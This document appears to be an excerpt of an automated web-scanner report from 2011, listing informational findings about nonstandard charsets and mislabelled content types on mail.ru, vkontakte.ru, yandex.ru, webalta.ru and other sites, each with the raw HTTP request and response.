<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<link rel="stylesheet" href="/main.css" type="text/css">
...[SNIP]...
34.3. http://mail.ru/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://mail.ru
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
</title>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<meta name="keywords" content="....., .......... ........... ....., ...., ......., ....., ......, ......, .........., ........, ........, ......" />
...[SNIP]...
34.4. http://my.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://my.webalta.ru
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:24:42 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Last-Modified: Thu, 28 Oct 2010 08:27:59 GMT
ETag: "15d8003-4d5d-4cc9340f"
Accept-Ranges: bytes
Content-Length: 19805

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
   <title>MyWebalta</title>

   <meta http-equiv="Content-Type" content="text/html; charset="utf-8">
   <meta name="keywords" content="xlst">
...[SNIP]...
34.5. http://vkontakte.ru/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://vkontakte.ru
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<link rel="shortcut icon" href="/images/faviconnew.ico" />

<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<meta name="description" content="<b>
...[SNIP]...
34.6. http://vkontakte.ru/login.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://vkontakte.ru
Path:   /login.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /login.php?act=slogin&al_frame=1&auto=1 HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:24:44 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-control: no-store
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: remixmid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixsid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixgid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixemail=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixpass=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Vary: Accept-Encoding
Content-Length: 540

<script type="text/javascript">
var _ua = navigator.userAgent;
var locDomain = 'vkontakte.ru'.match(/[a-zA-Z]+\.[a-zA-Z]+\.?$/)[0];
if (/opera/i.test(_ua) || !/msie 6/i.test(_ua) || document.domain !=
...[SNIP]...
34.7. http://www.gartner.com/include/webtrends.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.gartner.com
Path:   /include/webtrends.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /include/webtrends.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303732853510:ss=1303732853510; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:10:48 GMT
Content-type: text/html; charset=ISO8859_1
Date: Mon, 25 Apr 2011 12:10:48 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
X-PvInfo: [S10203.C10821.A151026.RA0.G24F27.UD4EB7C80].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22376

<!-- START OF Advanced SmartSource Data Collector TAG -->
<!-- Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.-->
<!-- $DateTime: 2006/03/09 14:15:22 $ -->
<!-- 2006/10/30: Modified by
...[SNIP]...
35. Content type incorrectly stated  previous  next
There are 121 instances of this issue:

35.1. http://an.yandex.ru/code/47934  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/47934

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /code/47934?rnd=33486&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwww.trucklist.ru%2Fcars%2Ftrucks%3Futm_source%3Dy_direct%26utm_medium%3Dcpc%26utm_campaign%3Dtruck%26_openstat%3DZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ&grab=dNCh0YDQtdC00L3QuNC1INC4INGC0Y_QttC10LvRi9C1INCz0YDRg9C30L7QstC40LrQuCDQsiDRgNC10LPQuNC-0L3QtSDQktGB0Y8g0KDQvtGB0YHQuNGPIC0g0L7QsdGK0Y_QstC70LXQvdC40Y8g0L3QsCBUcnVja2xpc3QucnUKMdCe0LHRitGP0LLQu9C10L3QuNGPIMK7wqAg0KHRgNC10LTQvdC40LUg0Lgg0YLRj9C20LXQu9GL0LUg0LPRgNGD0LfQvtCy0LjQutC4IAoyCjPQn9GA0LXQvNC40YPQvC3QvtCx0YrRj9Cy0LvQtdC90LjRjyA= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:43:31 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:43:31 GMT
Expires: Mon, 25 Apr 2011 14:43:31 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=00000FxPbsm00000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:43:31 GMT
Content-Length: 6232

var y5_sLinkHead = 'http://an.yandex.ru/count/Jd4i95txsC440000ZhE9MDi4XPwp2vQlAn7HaRXs6q01arIam00000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
35.2. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /code/57617?rnd=309442&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2F&grab=dNCf0L7QuNGB0LrQvtCy0LDRjyDRgdC40YHRgtC10LzQsCBXZWJhbHRh HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7397

var y5_sLinkHead = 'http://an.yandex.ru/count/CvVSK7g7hke40000ZhKnMDi4XP4H3fQb-Qd2aRHle6OCarIaeW00G7m3';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {
if
...[SNIP]...
35.3. http://an.yandex.ru/code/66894  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/66894

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /code/66894?rnd=928638&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fpogoda.webalta.ru%2F&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:30 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:30 GMT
Expires: Mon, 25 Apr 2011 14:20:30 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:30 GMT
Content-Length: 3561

var y5_sLinkHead = 'http://an.yandex.ru/count/1QrEGmZSpqW40000ZhuoMDi4XPvK49Qke0McaRm8UAa3arIapW0000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
35.4. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1303741250889 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:31:26 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");
35.5. http://auto.webalta.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://auto.webalta.ru
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; MG_id=8504; MG_type=news; __utmz=148001959.1303741225.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; MG_1668=2; __utma=148001959.511646108.1303741225.1303741225.1303741225.1; __utmc=148001959; __utmb=148001959.2.10.1303741225

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:23:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Feb 2011 08:10:09 GMT
ETag: "c8010a-37e-49b70691d1a40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
35.6. http://auto.webalta.ru/public/css/style-auto.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://auto.webalta.ru
Path:   /public/css/style-auto.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style-auto.css HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
Referer: http://auto.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Feb 2011 08:07:18 GMT
ETag: "8680c5-17af-49be911f81980"
Accept-Ranges: bytes
Content-Length: 6063
Connection: close
Content-Type: text/css

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.lin
...[SNIP]...
35.7. http://auto.webalta.ru/public/js/webalta.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://auto.webalta.ru
Path:   /public/js/webalta.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/js/webalta.js HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
Referer: http://auto.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 14 Dec 2010 16:41:55 GMT
ETag: "d182a6-158f-497617f95fac0"
Accept-Ranges: bytes
Content-Length: 5519
Connection: close
Content-Type: application/x-javascript

// version 2

function $$(target)
{
   return document.getElementById(target);
}

function newsSetCategory(n)
{
   var i;
   var item;
   var button;
   
   n = n || 0;

   for(i = 0; i < 10; i++)
   
...[SNIP]...
35.8. http://b2bcontext.ru/services/advertisement/getblock  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b2bcontext.ru
Path:   /services/advertisement/getblock

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /services/advertisement/getblock?17723897 HTTP/1.1
Host: b2bcontext.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:47:19 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 30189

var b2bctb_id_12402960=b2bctb_rand;var keyg_12402960=new Array();var keyb_12402960=new Array();var b2b_check_urls_dim=[{id:4,atr:"iuuq;00xnnbjm/sv"},{id:8,atr:"iuuq;00xxx/xnnbjm/sv"},{id:12,atr:"iuuq;
...[SNIP]...
35.9. http://css.loveplanet.ru/3/img/pda/main.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://css.loveplanet.ru
Path:   /3/img/pda/main.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /3/img/pda/main.js HTTP/1.1
Host: css.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:47 GMT
Content-Type: application/x-javascript; charset=UTF-8
Last-Modified: Fri, 22 Apr 2011 08:57:07 GMT
Connection: keep-alive
Expires: Mon, 25 Apr 2011 17:51:47 GMT
Cache-Control: max-age=10800
Content-Length: 5733

function onLoadPage(){return true;}

/* -------------------------------------------------------------
   Opening and closing blocs
------------------------------------------------------------- */
f
...[SNIP]...
35.10. http://direct.yandex.ru/pages/direct/_direct-1303387947.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://direct.yandex.ru
Path:   /pages/direct/_direct-1303387947.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
35.11. http://direct.yandex.ru/pages/index/_index-1303387946.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://direct.yandex.ru
Path:   /pages/index/_index-1303387946.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /pages/index/_index-1303387946.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:02 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:26 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:02 GMT
Cache-Control: max-age=86400
Content-Length: 13173

var key="",time="",is_mediaplan;var submit_flag=false;var SCRIPT="/registered/main.pl";var MAX_URL_LENGTH=1024;Array.prototype.__fftrap=function(){};function AdvqLite(m,c,g,j,t){var q=800,l=600;var s=
...[SNIP]...
35.12. http://duckduckgo.com/b.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://duckduckgo.com
Path:   /b.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b.js?q=site%3Axss.cx&t= HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=site%3Axss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 15:39:09 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Expires: Mon, 25 Apr 2011 15:39:08 GMT
Cache-Control: no-cache
Content-Length: 2

;
35.13. http://duckduckgo.com/o.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://duckduckgo.com
Path:   /o.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

